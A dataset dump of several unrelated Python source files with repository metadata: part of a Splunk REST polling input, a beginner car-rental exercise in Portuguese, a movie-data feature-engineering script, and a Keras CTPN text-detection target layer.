    responsible for writing events to stdout; stdout is flushed afterwards.
    """
    try:
        if REGEX_PATTERN:
            search_result = REGEX_PATTERN.search(output)
            if search_result == None:
                # Filtered out: the payload did not match the pattern.
                return
        RESPONSE_HANDLER_INSTANCE(response,output,type,req_args,endpoint)
        sys.stdout.flush()
    except RuntimeError,e:
        logging.error("Looks like an error handle the response output: %s" % str(e))
# prints validation error data to be consumed by Splunk
def print_validation_error(s):
    """Emit a validation failure message in the XML format splunkd expects."""
    # print() call form behaves identically on Python 2 (single argument)
    # and Python 3, unlike the original Python 2-only print statement.
    print("<error><message>%s</message></error>" % encodeXMLText(s))
# prints XML stream
def print_xml_single_instance_mode(s):
    """Stream one event to splunkd in XML streaming mode."""
    # print() call form behaves identically on Python 2 (single argument)
    # and Python 3, unlike the original Python 2-only print statement.
    print("<stream><event><data>%s</data></event></stream>" % encodeXMLText(s))
# prints simple stream
def print_simple(s):
    """Write the raw event string followed by a trailing blank line."""
    # print() call form behaves identically on Python 2 (single argument)
    # and Python 3, unlike the original Python 2-only print statement.
    print("%s\n" % s)
def encodeXMLText(text):
    """Escape the five XML-special characters in *text* for safe embedding.

    Fix: in the checked-in version the entity strings had been decoded
    back to the raw characters, so every replace() mapped a character to
    itself and the function was a no-op. '&' must be escaped first so the
    entities produced for the other characters are not double-escaped.
    """
    text = text.replace("&", "&amp;")
    text = text.replace("\"", "&quot;")
    text = text.replace("'", "&apos;")
    text = text.replace("<", "&lt;")
    text = text.replace(">", "&gt;")
    return text
def usage():
    """Print invocation help, log the misuse, and exit with status 2."""
    # Fix: the original had a "%s" with no interpolation argument (and used
    # the Python 2-only print statement), so a literal "%s" was printed;
    # substitute the program name as intended.
    print("usage: %s [--scheme|--validate-arguments]" % sys.argv[0])
    logging.error("Incorrect Program Usage")
    sys.exit(2)
def do_scheme():
    """Write the modular-input introspection scheme XML to stdout."""
    # print() call form behaves identically on Python 2 (single argument)
    # and Python 3, unlike the original Python 2-only print statement.
    print(SCHEME)
#read XML configuration passed from splunkd, need to refactor to support single instance mode
def get_input_config():
    """Parse the run-time XML configuration splunkd writes to stdin.

    Returns a flat dict containing the session key, server URI, stanza
    name, every stanza <param> value, and the checkpoint directory.
    Raises if the payload is empty or cannot be parsed.
    """
    config = {}
    try:
        # read everything from stdin
        config_str = sys.stdin.read()
        # parse the config XML
        doc = xml.dom.minidom.parseString(config_str)
        root = doc.documentElement
        session_key_node = root.getElementsByTagName("session_key")[0]
        if session_key_node and session_key_node.firstChild and session_key_node.firstChild.nodeType == session_key_node.firstChild.TEXT_NODE:
            data = session_key_node.firstChild.data
            config["session_key"] = data
        server_uri_node = root.getElementsByTagName("server_uri")[0]
        if server_uri_node and server_uri_node.firstChild and server_uri_node.firstChild.nodeType == server_uri_node.firstChild.TEXT_NODE:
            data = server_uri_node.firstChild.data
            config["server_uri"] = data
        conf_node = root.getElementsByTagName("configuration")[0]
        if conf_node:
            logging.debug("XML: found configuration")
            # Only the first stanza is read — single-instance mode with
            # multiple stanzas is not supported here (see comment above).
            stanza = conf_node.getElementsByTagName("stanza")[0]
            if stanza:
                stanza_name = stanza.getAttribute("name")
                if stanza_name:
                    logging.debug("XML: found stanza " + stanza_name)
                    config["name"] = stanza_name
                    params = stanza.getElementsByTagName("param")
                    for param in params:
                        param_name = param.getAttribute("name")
                        logging.debug("XML: found param '%s'" % param_name)
                        if param_name and param.firstChild and \
                           param.firstChild.nodeType == param.firstChild.TEXT_NODE:
                            data = param.firstChild.data
                            config[param_name] = data
                            logging.debug("XML: '%s' -> '%s'" % (param_name, data))
        checkpnt_node = root.getElementsByTagName("checkpoint_dir")[0]
        if checkpnt_node and checkpnt_node.firstChild and \
           checkpnt_node.firstChild.nodeType == checkpnt_node.firstChild.TEXT_NODE:
            config["checkpoint_dir"] = checkpnt_node.firstChild.data
        if not config:
            raise Exception, "Invalid configuration received from Splunk."
    except Exception, e:
        raise Exception, "Error getting Splunk configuration via STDIN: %s" % str(e)
    return config
#read XML configuration passed from splunkd, need to refactor to support single instance mode
def get_validation_config():
    """Parse the validation XML splunkd writes to stdin on input save.

    Returns a dict of the form {"stanza": <item name>, <param>: <value>, ...}
    for the single <item> element in the payload.
    """
    val_data = {}
    # read everything from stdin
    val_str = sys.stdin.read()
    # parse the validation XML
    doc = xml.dom.minidom.parseString(val_str)
    root = doc.documentElement
    logging.debug("XML: found items")
    item_node = root.getElementsByTagName("item")[0]
    if item_node:
        logging.debug("XML: found item")
        name = item_node.getAttribute("name")
        val_data["stanza"] = name
        params_node = item_node.getElementsByTagName("param")
        for param in params_node:
            name = param.getAttribute("name")
            logging.debug("Found param %s" % name)
            if name and param.firstChild and \
               param.firstChild.nodeType == param.firstChild.TEXT_NODE:
                val_data[name] = param.firstChild.data
    return val_data
if __name__ == '__main__':
    if len(sys.argv) > 1:
        # Introspection hooks invoked directly by splunkd.
        if sys.argv[1] == "--scheme":
            do_scheme()
        elif sys.argv[1] == "--validate-arguments":
            do_validate()
        else:
            usage()
    else:
        # Normal run: read the stanza configuration from stdin, expand any
        # $token$ placeholders in the endpoint, then start polling.
        config = get_input_config()
        original_endpoint=config.get("endpoint")
        #token replacement
        endpoint_list = replaceTokens(original_endpoint)
        sequential_mode=int(config.get("sequential_mode",0))
        if bool(sequential_mode):
            # One poll loop walks all endpoints in order (do_run loops forever).
            do_run(config,endpoint_list)
        else: #parallel mode
            # One polling thread per expanded endpoint; the main thread then
            # falls through while the non-daemon workers keep the process alive.
            for endpoint in endpoint_list:
                requester = threading.Thread(target=do_run, args=(config,[endpoint]))
                requester.start()
    sys.exit(0)
| [
"ddallimore@splunk.com"
] | ddallimore@splunk.com |
5a6cba04c45e10f428b0c7903415372b7a0ae2c4 | 85af8bcd480794a413e27c114b07bfae50447437 | /Python/PycharmProjects/aula 7/desafio 015.py | b734a05b4dd97dccb6dfef94c114d18952a788af | [
"MIT"
] | permissive | MarcelaSamili/Desafios-do-curso-de-Python | 83974aeb30cc45177635a6248af2f99b3fdbd3fa | f331e91821c0c25b3e32d2075254ef650292f280 | refs/heads/main | 2023-05-31T20:07:56.844357 | 2021-07-05T12:30:18 | 2021-07-05T12:30:18 | 375,374,975 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | # Escreva um programa que pergunte a quantidade de Km percorridos por um carro alugado e a quantidade de dias pelos quais ele foi alugado.
# Compute the price to pay, given that the car costs R$60 per day and
# R$0.15 per km driven.
km = float(input('Qualtos KM voce percorreu com o carro?KM'))
dias = int(input('Quantos dias voce alugou o carro?'))
# Bill = daily rate * days rented + per-kilometre rate * distance driven.
preço = (60*dias) + (0.15*km)
print('O valor do aluguel ficou em R${}'.format(preço))
| [
"marcela.santos10.b@gmail.com"
] | marcela.santos10.b@gmail.com |
c2f2d1e2fa978cbe1369c0ec85d70b4be9c746c9 | 66f5ab6d5f78d304350ec4dd734b5d30cb8423f7 | /first.py | c60dbcc76e375946b5952d2d0841112066974bb0 | [] | no_license | akuppam/Py_programs | 4695819bbe744bed6c04b6a5cbde67da6dae0e98 | 65c7f9830c6a8602b65ae6a5b273453efdd846ac | refs/heads/master | 2021-01-19T01:13:53.999056 | 2017-04-04T20:36:50 | 2017-04-04T20:36:50 | 87,232,275 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16 | py | print "good one" | [
"noreply@github.com"
] | akuppam.noreply@github.com |
432927ddc73c6e066d33be9506269fb5c92f748b | 14a4e6e0bf76c68e471794088a5e2a95d6ce4b5a | /test.py | 687e974121098855cd758ed1256dea7e645205ec | [] | no_license | yuzhengfa/test | e16c2479baf159d887a117481398513349bd8cb0 | 63dbe2534a346b86bd77e70c829a6e4ccb886128 | refs/heads/master | 2020-04-30T09:12:53.099485 | 2019-03-20T14:58:58 | 2019-03-20T14:58:58 | 176,740,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,333 | py |
# coding: utf-8
# In[17]:
import pandas as pd
import numpy as np
import re
# In[18]:
# Clean the credit columns (director/writer/actor/types).
def sub_name(str1):
    """Normalise a comma-separated list of credited names.

    Spaces are stripped from every name. Names whose first character is
    ASCII-alphabetic (after UTF-8 encoding) are kept as-is; all other
    names (e.g. CJK names carrying Latin annotations) have their
    Latin/ASCII characters removed. The cleaned names are re-joined with
    commas and returned.
    """
    raw_parts = str1.split(',')
    cleaned = []
    for part in raw_parts:
        part = re.sub('[ ]','',part)
        if part[0].encode( 'UTF-8' ).isalpha():
            cleaned.append(part)
        else:
            cleaned.append(re.sub('[ A-Za-z?-í-""]','',part))
    if len(cleaned) == len(raw_parts):
        return ','.join(cleaned)
# In[19]:
def get_median(data):
    """Return the median of a non-empty numeric sequence.

    Fix: the original called data.sort(), silently reordering the
    caller's list as a side effect; sorting a copy leaves the input
    untouched. The symmetric-index trick (ordered[half] + ordered[~half])
    handles both odd and even lengths.
    """
    ordered = sorted(data)
    half = len(ordered) // 2
    return (ordered[half] + ordered[~half]) / 2
# In[44]:
# Scratch cell: an empty list is falsy, so this prints "ok".
list1 = []
if not list1:
    print("ok")
else:
    print("No")
# In[48]:
# Aggregate per-name statistics for one credit attribute.
def statistics(attribute,train_data,test_data):
    """For each row of test_data, match every comma-separated name in
    test_data[attribute] against the same column of train_data and
    aggregate the score/box-office values of the matching training rows.

    Returns four parallel lists, one entry per test row that had at least
    one match: mean matched-film count, mean of the row's max score, mean
    of the row's min score, mean of the row's mean score.
    """
    # build score-derived features
    num = 0
    count = 0
    z_count = []  # scores of matched training films for the current row
    s_count = []  # box-office ("account") values of the same films
    max_score = []  # highest score
    min_score = []  # lowest score
    ave_score = []  # mean score
    max_score_count = []  # box office of the highest-scored film
    min_score_count = []  # box office of the lowest-scored film
    max_count = []
    min_count = []
    ave_count = []
    num_move = []
    # index_count = []
    A = []
    B = []
    C = []
    D = []
    E = []
    F = []
    G = []
    H = []
    I = []
    # J = []
    for i in test_data[attribute][:]:
        a = i.split(',')
        # print(a)
        for b in a:
            # Linear scan of the training set per name (O(rows) lookups).
            for j in train_data.index:
                if b in train_data[attribute][j].split(','):
                    z_count.append(train_data.score[j])  # score
                    s_count.append(train_data.account[j])
                    # s_count.append(train_data1.count[j])  # box office
                    # index_count.append(j)
                    # num = num + train_data.account[j]
                    count = count+1
        # print(z_count)
        # print(s_count)
        # print(count)
        if len(z_count) == 0:
            # No training match for any name on this row: skip it entirely
            # (note the output lists then stay shorter than test_data).
            continue
        else:
            A.append(max(z_count))  # max score
            B.append(min(z_count))  # min score
            C.append(sum(z_count)/count)  # mean score
            # C.append(np.median(z_count))
            D.append(count)
            E.append(s_count[z_count.index(max(z_count))])
            F.append(s_count[z_count.index(min(z_count))])
            G.append(max(s_count))  # max box office
            H.append(min(s_count))  # min box office
            I.append(sum(s_count)/count)  # mean box office
            # Reset the per-row accumulators for the next test row.
            s_count = []
            z_count = []
            count = 0
        # score aggregates (A..I each hold one element here, so sum/len is
        # effectively that single value — averaged rather than max'd per the
        # author's note in the original comment)
        max_score.append(sum(A)/len(A))
        min_score.append(sum(B)/len(B))
        ave_score.append(sum(C)/len(C))
        # ave_score.append(np.median(z_count))
        num_move.append(sum(D)/len(D))
        max_score_count.append(sum(E)/len(E))
        min_score_count.append(sum(F)/len(F))
        # box-office aggregates
        max_count.append(sum(G)/len(G))
        min_count.append(sum(H)/len(H))
        ave_count.append(sum(I)/len(I))
        # num_move.append(max(D))
        A = []
        B = []
        C = []
        D = []
        E = []
        F = []
        G = []
        H = []
        I = []
        # print(max_count)
        # print(min_count)
        # print(ave_count)
        # print(num_move)
        # print(max_score)
        # print(min_score)
        # print(ave_score)
        # print(max_score_count)
        # print(min_score_count)
    return num_move,max_score,min_score,ave_score
# In[25]:
# train_data = pd.read_csv('train_data.csv',encoding='gbk')
# test_data = pd.read_csv('test_data.csv',encoding='gbk')
# train_data = train_data.dropna(axis=0,how='any')
# drector_num = test_data.apply(lambda x:sub_name(x['drector']),axis=1)
# writer_num = test_data.apply(lambda x:sub_name(x['writer']),axis=1)
# actor_num = test_data.apply(lambda x:sub_name(x['actor']),axis=1)
# types_num = test_data.apply(lambda x:sub_name(x['types']),axis=1)
# flim_version = list(map(lambda x: len(test_data.times[x].split(' ')),range(len(test_data))))
# country_number = list(map(lambda x: len(test_data.country[x].split(' ')),range(len(test_data))))
# test_data['types_name'] = pd.DataFrame(types_num)
# test_data['drector_name'] = pd.DataFrame(drector_num)
# test_data['writer_name'] = pd.DataFrame(writer_num)
# test_data['actor_name'] = pd.DataFrame(actor_num)
# test_data['flim_version'] = pd.DataFrame(flim_version)
# test_data['country_number'] = pd.DataFrame(country_number)
# In[26]:
# test_data
# In[53]:
# test_data.writer_name
# In[28]:
# object_name = ['drector_name','writer_name','actor_name','types_name']
# for i in object_name:
# A,B,C,D= statistics(i,train_data,test_data)
# test_data[i[0]+'_num_move'] = pd.DataFrame(A)
# test_data[i[0]+'_max_score'] = pd.DataFrame(B)
# test_data[i[0]+'_min_score'] = pd.DataFrame(C)
# test_data[i[0]+'_ave_score'] = pd.DataFrame(D)
# In[52]:
# z_count = []
# s_count = []
# count = 0
# for i in test_data['writer_name'][:]:
# a = i.split(',')
# print(a)
# for b in a:
# for j in train_data.index:
# if b in train_data['writer_name'][j].split(','):
# z_count.append(train_data.score[j])#评分
# s_count.append(train_data.account[j])
# # s_count.append(train_data1.count[j])#票房
# # index_count.append(j)
# # num = num + train_data.account[j]
# count = count+1
# if len(z_count) == 0:
# continue
# else:
# print(max(z_count))
# # print(min(z_count))
# # print(s_count)
# print(count)
# In[49]:
def change_data():
    """Load the train/test CSVs and build the engineered feature matrix
    for the test set: cleaned credit names, training-set score aggregates
    per credit attribute, crew averages, and one-hot genre flags.
    Returns the test DataFrame with the raw text columns dropped.
    """
    train_data = pd.read_csv('train_data.csv',encoding='gbk')
    test_data = pd.read_csv('test_data.csv',encoding='gbk')
    train_data = train_data.dropna(axis=0,how='any')
    # Normalise the comma-separated credit strings via sub_name.
    drector_num = test_data.apply(lambda x:sub_name(x['drector']),axis=1)
    writer_num = test_data.apply(lambda x:sub_name(x['writer']),axis=1)
    actor_num = test_data.apply(lambda x:sub_name(x['actor']),axis=1)
    types_num = test_data.apply(lambda x:sub_name(x['types']),axis=1)
    # Counts of space-separated entries: number of cuts and countries.
    flim_version = list(map(lambda x: len(test_data.times[x].split(' ')),range(len(test_data))))
    country_number = list(map(lambda x: len(test_data.country[x].split(' ')),range(len(test_data))))
    test_data['types_name'] = pd.DataFrame(types_num)
    test_data['drector_name'] = pd.DataFrame(drector_num)
    test_data['writer_name'] = pd.DataFrame(writer_num)
    test_data['actor_name'] = pd.DataFrame(actor_num)
    test_data['flim_version'] = pd.DataFrame(flim_version)
    test_data['country_number'] = pd.DataFrame(country_number)
    # Training-set aggregates per credit attribute; new columns are
    # prefixed with the attribute's first letter (d_/w_/a_/t_).
    object_name = ['drector_name','writer_name','actor_name','types_name']
    for i in object_name:
        A,B,C,D= statistics(i,train_data,test_data)
        test_data[i[0]+'_num_move'] = pd.DataFrame(A)
        test_data[i[0]+'_max_score'] = pd.DataFrame(B)
        test_data[i[0]+'_min_score'] = pd.DataFrame(C)
        test_data[i[0]+'_ave_score'] = pd.DataFrame(D)
    # Pairwise and three-way averages of film counts over director/writer/actor.
    temp1 = list(map(lambda x:(test_data['d_num_move'][x]+test_data['w_num_move'][x])/2,test_data.index))
    temp2 = list(map(lambda x:(test_data['d_num_move'][x]+test_data['a_num_move'][x])/2,test_data.index))
    temp3 = list(map(lambda x:(test_data['w_num_move'][x]+test_data['a_num_move'][x])/2,test_data.index))
    temp4 = list(map(lambda x:(test_data['d_num_move'][x]+test_data['w_num_move'][x]+test_data['a_num_move'][x])/3,test_data.index))
    # Pairwise and three-way averages of mean scores over director/writer/actor.
    temp9 = list(map(lambda x:(test_data['d_ave_score'][x]+test_data['w_ave_score'][x])/2,test_data.index))
    temp10 = list(map(lambda x:(test_data['d_ave_score'][x]+test_data['a_ave_score'][x])/2,test_data.index))
    temp11 = list(map(lambda x:(test_data['w_ave_score'][x]+test_data['a_ave_score'][x])/2,test_data.index))
    temp12 = list(map(lambda x:(test_data['d_ave_score'][x]+test_data['w_ave_score'][x]+test_data['a_ave_score'][x])/3,test_data.index))
    test_data['ave_num_move1'] = pd.DataFrame(temp1,index=test_data.index)
    test_data['ave_num_move2'] = pd.DataFrame(temp2,index=test_data.index)
    test_data['ave_num_move3'] = pd.DataFrame(temp3,index=test_data.index)
    test_data['ave_num_move4'] = pd.DataFrame(temp4,index=test_data.index)
    test_data['ave_score1'] = pd.DataFrame(temp9,index=test_data.index)
    test_data['ave_score2'] = pd.DataFrame(temp10,index=test_data.index)
    test_data['ave_score3'] = pd.DataFrame(temp11,index=test_data.index)
    test_data['ave_score4'] = pd.DataFrame(temp12,index=test_data.index)
    # One-hot genre flags: one 0/1 column per entry of key_s, set when the
    # genre string appears in the row's (space-stripped) types field.
    test_types = list(test_data.types)
    key_s = ['剧情', '动作', '犯罪', '冒险', '科幻', '惊悚', '奇幻', '悬疑', '喜剧', '战争', '动画', '传记', '历史', '西部', '爱情', '灾难', '武侠', '古装', '音乐', '运动', '家庭', '恐怖', '鬼怪', '歌舞', '情色', '儿童', '同性', '悬念', '黑色电影', 'Adult', 'Reality-TV']
    _types = [[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[]]
    for i in range(0,len(list(test_types))):
        temp = re.sub('[ ]','',test_types[i])
        for j in range(len(_types)):
            _types[j].append(list(np.where((key_s[j] in temp),[1],[0]))[0])
            # On the last row, materialise the accumulated flag column.
            if i == len(list(test_types))-1:
                test_data[key_s[j]] = pd.DataFrame(_types[j],index=test_data.index)
    # Drop the raw text columns (plus helper columns) to form the matrix.
    X_test = test_data.drop(['title','types','drector','writer','actor','times','country','score','types_name','drector_name','writer_name','actor_name','t_num_move'],axis=1)
    return X_test
# In[50]:
# Materialise the engineered test features and persist them for later modelling.
test = change_data()
# In[51]:
test.to_csv('test1_data.csv',index=False,encoding='gbk')
# In[ ]:
# def get_median(data):
# data.sort()
# half = len(data) // 2
# return (data[half] + data[~half]) / 2
# In[ ]:
# data = [7.2,8.7,7.2]
# #
# np.median(data)
# In[ ]:
# change_data()
| [
"794191669@qq.com"
] | 794191669@qq.com |
9740ebd46f4efaf866df9077cf36f71f266f2f83 | 1f4c19a1bc91c09b3b5b54346b67c913363f7cd0 | /ctpn/layers/target.py | d8c13115572c3aeffa3a30d87192baf4332b5894 | [
"Apache-2.0"
] | permissive | ximingr/ctpn-with-keras | d80bcd753a8d82c4504b8635f43f8253cadb878d | d78d74bbf55cbf5d4867e363eb417c1590a8fd52 | refs/heads/master | 2020-07-06T11:32:24.968182 | 2019-09-27T05:42:32 | 2019-09-27T05:42:32 | 203,003,267 | 0 | 0 | Apache-2.0 | 2019-09-27T05:42:33 | 2019-08-18T12:57:43 | Python | UTF-8 | Python | false | false | 10,031 | py | # -*- coding: utf-8 -*-
"""
File Name: Target
Description : 分类和回归目标层
Author : mick.yi
date: 2019/3/13
"""
from keras import layers
import tensorflow as tf
from ..utils import tf_utils
def compute_iou(gt_boxes, anchors):
    """Compute the pairwise IoU matrix between GT boxes and anchors.

    :param gt_boxes: [N,(y1,x1,y2,x2)]
    :param anchors: [M,(y1,x1,y2,x2)]
    :return: IoU matrix [N,M]
    """
    # Broadcast to [N,1,4] against [1,M,4] so every GT/anchor pair is compared.
    boxes_a = tf.expand_dims(gt_boxes, axis=1)
    boxes_b = tf.expand_dims(anchors, axis=0)
    # Intersection extents, clipped at zero for non-overlapping pairs.
    overlap_w = tf.maximum(0.0,
                           tf.minimum(boxes_a[:, :, 3], boxes_b[:, :, 3]) -
                           tf.maximum(boxes_a[:, :, 1], boxes_b[:, :, 1]))
    overlap_h = tf.maximum(0.0,
                           tf.minimum(boxes_a[:, :, 2], boxes_b[:, :, 2]) -
                           tf.maximum(boxes_a[:, :, 0], boxes_b[:, :, 0]))
    overlap = overlap_w * overlap_h
    # Union = area(A) + area(B) - intersection.
    area_a = (boxes_a[:, :, 3] - boxes_a[:, :, 1]) * \
             (boxes_a[:, :, 2] - boxes_a[:, :, 0])
    area_b = (boxes_b[:, :, 3] - boxes_b[:, :, 1]) * \
             (boxes_b[:, :, 2] - boxes_b[:, :, 0])
    return tf.divide(overlap, area_a + area_b - overlap, name='regress_target_iou')
def ctpn_regress_target(anchors, gt_boxes):
    """Compute regression targets for matched anchor/GT pairs.

    :param anchors: [N,(y1,x1,y2,x2)]
    :param gt_boxes: [N,(y1,x1,y2,x2)] GT box matched to each anchor
    :return: [N,(dy,dh,dx)] where dx is the side-refinement offset
    """
    anchor_h = anchors[:, 2] - anchors[:, 0]
    anchor_cy = (anchors[:, 2] + anchors[:, 0]) * 0.5
    gt_h = gt_boxes[:, 2] - gt_boxes[:, 0]
    gt_cy = (gt_boxes[:, 2] + gt_boxes[:, 0]) * 0.5
    # Vertical centre shift, log height ratio, and horizontal side refinement.
    dy = (gt_cy - anchor_cy) / anchor_h
    dh = tf.log(gt_h / anchor_h)
    dx = side_regress_target(anchors, gt_boxes)
    targets = tf.stack([dy, dh, dx], axis=1)
    # Scale each component by a fixed per-component factor.
    return targets / tf.constant([0.1, 0.2, 0.1])
def side_regress_target(anchors, gt_boxes):
    """Compute the side-refinement regression target.

    Moving an anchor's side edge onto the GT side edge is equivalent to
    twice the centre-x shift, normalised by the anchor width; anchors that
    are not side anchors (centres aligned with their GT) get an offset of 0.

    :param anchors: [N,(y1,x1,y2,x2)]
    :param gt_boxes: GT boxes matched to the anchors [N,(y1,x1,y2,x2)]
    :return: [N] horizontal offsets
    """
    anchor_w = anchors[:, 3] - anchors[:, 1]  # effectively the fixed width 16
    anchor_cx = (anchors[:, 3] + anchors[:, 1]) * 0.5
    gt_cx = (gt_boxes[:, 3] + gt_boxes[:, 1]) * 0.5
    return (gt_cx - anchor_cx) * 2 / anchor_w
def ctpn_target_graph(gt_boxes, gt_cls, anchors, valid_anchors_indices, train_anchors_num=128, positive_ratios=0.5,
                      max_gt_num=50):
    """Build CTPN classification and regression targets for a single image.

    Positive samples are (a) anchors with IoU >= 0.7 against some GT and
    (b) for every GT, the anchor(s) with the highest IoU — so each GT is
    guaranteed at least one matched anchor.

    :param gt_boxes: GT boxes [gt_num, (y1,x1,y2,x2,tag)], tag=0 marks padding
    :param gt_cls: GT classes [gt_num, 1+1], last position is tag, tag=0 marks padding
    :param anchors: [anchor_num, (y1,x1,y2,x2)]
    :param valid_anchors_indices: indices of the valid anchors [anchor_num]
    :param train_anchors_num: total number of sampled anchors per image
    :param positive_ratios: fraction of the sample that may be positive
    :param max_gt_num: maximum GT count (unused here; kept for interface parity)
    :return:
        deltas: [train_anchors_num, (dy,dh,dx,tag)] regression targets,
                tag=1 real sample, tag=0 padding
        class_ids: [train_anchors_num, (class_id,tag)]
        indices: [train_anchors_num, (anchor_index,tag)] tag=1 positive,
                 tag=0 padding, tag=-1 negative
        plus float scalars: gt_num, positive_num, negative_num,
        gt_match_min_iou, gt_match_mean_iou (for metrics)
    """
    # Strip padding rows; gt_cls goes from [N,1] to [N].
    gt_boxes = tf_utils.remove_pad(gt_boxes)
    gt_cls = tf_utils.remove_pad(gt_cls)[:, 0]
    gt_num = tf.shape(gt_cls)[0]  # number of real GT boxes
    # Pairwise IoU [gt_num, anchor_num].
    iou = compute_iou(gt_boxes, anchors)
    # (b) For each GT the max-IoU anchor(s) are positives (possibly several).
    gt_iou_max = tf.reduce_max(iou, axis=1, keep_dims=True)  # [gt_num,1]
    gt_iou_max_bool = tf.equal(iou, gt_iou_max)  # bool [gt_num, anchor_num]
    # (a) Each anchor's max IoU, positive only when it is >= 0.7; otherwise
    # the threshold is replaced with 1.0 so no IoU entry can equal it
    # (degenerate boxes with IoU exactly 1.0 aside).
    anchors_iou_max = tf.reduce_max(iou, axis=0, keep_dims=True)  # [1, anchor_num]
    anchors_iou_max = tf.where(tf.greater_equal(anchors_iou_max, 0.7),
                               anchors_iou_max,
                               tf.ones_like(anchors_iou_max))
    anchors_iou_max_bool = tf.equal(iou, anchors_iou_max)
    # Union of the two kinds of positive matches.
    positive_bool_matrix = tf.logical_or(gt_iou_max_bool, anchors_iou_max_bool)
    # Min/mean IoU of the matched pairs, exported as training metrics.
    gt_match_min_iou = tf.reduce_min(tf.boolean_mask(iou, positive_bool_matrix), keep_dims=True)[0]
    gt_match_mean_iou = tf.reduce_mean(tf.boolean_mask(iou, positive_bool_matrix), keep_dims=True)[0]
    # Positive (gt_index, anchor_index) pairs.
    positive_indices = tf.where(positive_bool_matrix)
    # Randomly subsample positives to at most train_anchors_num * positive_ratios.
    positive_num = tf.minimum(tf.shape(positive_indices)[0], int(train_anchors_num * positive_ratios))
    positive_indices = tf.random_shuffle(positive_indices)[:positive_num]
    # Gather the sampled anchors and their matched GT boxes/classes.
    positive_gt_indices = positive_indices[:, 0]
    positive_anchor_indices = positive_indices[:, 1]
    positive_anchors = tf.gather(anchors, positive_anchor_indices)
    positive_gt_boxes = tf.gather(gt_boxes, positive_gt_indices)
    positive_gt_cls = tf.gather(gt_cls, positive_gt_indices)
    # Regression targets for the positives only.
    deltas = ctpn_regress_target(positive_anchors, positive_gt_boxes)
    # Negatives: anchors whose best IoU is below 0.5 and that are not positives.
    negative_bool = tf.less(tf.reduce_max(iou, axis=0), 0.5)
    positive_bool = tf.reduce_any(positive_bool_matrix, axis=0)  # [anchor_num]
    negative_bool = tf.logical_and(negative_bool, tf.logical_not(positive_bool))
    # Sample negatives to fill the remainder of the training batch.
    negative_num = tf.minimum(int(train_anchors_num * (1. - positive_ratios)), train_anchors_num - positive_num)
    negative_indices = tf.random_shuffle(tf.where(negative_bool)[:, 0])[:negative_num]
    negative_gt_cls = tf.zeros([negative_num])  # negatives get class id 0
    negative_deltas = tf.zeros([negative_num, 3])
    # Concatenate positives and negatives.
    deltas = tf.concat([deltas, negative_deltas], axis=0, name='ctpn_target_deltas')
    class_ids = tf.concat([positive_gt_cls, negative_gt_cls], axis=0, name='ctpn_target_class_ids')
    indices = tf.concat([positive_anchor_indices, negative_indices], axis=0,
                        name='ctpn_train_anchor_indices')
    # Map back to indices within the full (valid) anchor set.
    indices = tf.gather(valid_anchors_indices, indices)
    # Pad to a fixed length, appending the sample tag column.
    deltas, class_ids = tf_utils.pad_list_to_fixed_size([deltas, tf.expand_dims(class_ids, 1)],
                                                        train_anchors_num)
    # Negatives get tag -1 to simplify downstream masking.
    indices = tf_utils.pad_to_fixed_size_with_negative(tf.expand_dims(indices, 1), train_anchors_num,
                                                       negative_num=negative_num, data_type=tf.int64)
    return [deltas, class_ids, indices, tf.cast(  # metric outputs must be float
        gt_num, dtype=tf.float32), tf.cast(
        positive_num, dtype=tf.float32), tf.cast(negative_num, dtype=tf.float32),
        gt_match_min_iou, gt_match_mean_iou]
class CtpnTarget(layers.Layer):
    """Keras layer that builds CTPN training targets for a batch of images.

    Wraps :func:`ctpn_target_graph`, applying it image-by-image via
    ``tf_utils.batch_slice``.
    """

    def __init__(self, batch_size, train_anchors_num=128, positive_ratios=0.5, max_gt_num=50, **kwargs):
        self.batch_size = batch_size
        self.train_anchors_num = train_anchors_num
        self.positive_ratios = positive_ratios
        self.max_gt_num = max_gt_num
        super(CtpnTarget, self).__init__(**kwargs)

    def call(self, inputs, **kwargs):
        """Compute per-image targets for the whole batch.

        :param inputs:
            inputs[0]: GT boxes [batch_size, MAX_GT_BOXs,(y1,x1,y2,x2,tag)], tag=0 is padding
            inputs[1]: GT classes [batch_size, MAX_GT_BOXs,num_class+1]; last position is tag, tag=0 is padding
            inputs[2]: anchors [batch_size, anchor_num,(y1,x1,y2,x2)]
            inputs[3]: valid anchor indices [batch_size, anchor_num]
        :return: per-image outputs of ``ctpn_target_graph``, batched.
        """
        gt_boxes, gt_cls_ids, anchors, valid_anchors_indices = inputs

        def _single_image_targets(boxes, cls_ids, img_anchors, img_valid_indices):
            # Target computation for one image; sliced over the batch below.
            return ctpn_target_graph(boxes, cls_ids, img_anchors, img_valid_indices,
                                     self.train_anchors_num,
                                     self.positive_ratios,
                                     self.max_gt_num)

        return tf_utils.batch_slice(
            [gt_boxes, gt_cls_ids, anchors, valid_anchors_indices],
            _single_image_targets,
            batch_size=self.batch_size)

    def compute_output_shape(self, input_shape):
        batch = input_shape[0][0]
        return [
            (batch, self.train_anchors_num, 4),  # deltas (dy,dh,dx,tag)
            (batch, self.train_anchors_num, 2),  # class ids (class_id,tag)
            (batch, self.train_anchors_num, 2),  # anchor indices (index,tag)
            (batch,),                            # gt_num
            (batch,),                            # positive_num
            (batch,),                            # negative_num
            (batch, 1),                          # gt_match_min_iou
            (batch, 1),                          # gt_match_mean_iou
        ]
| [
"ximing.fr@gmail.com"
] | ximing.fr@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.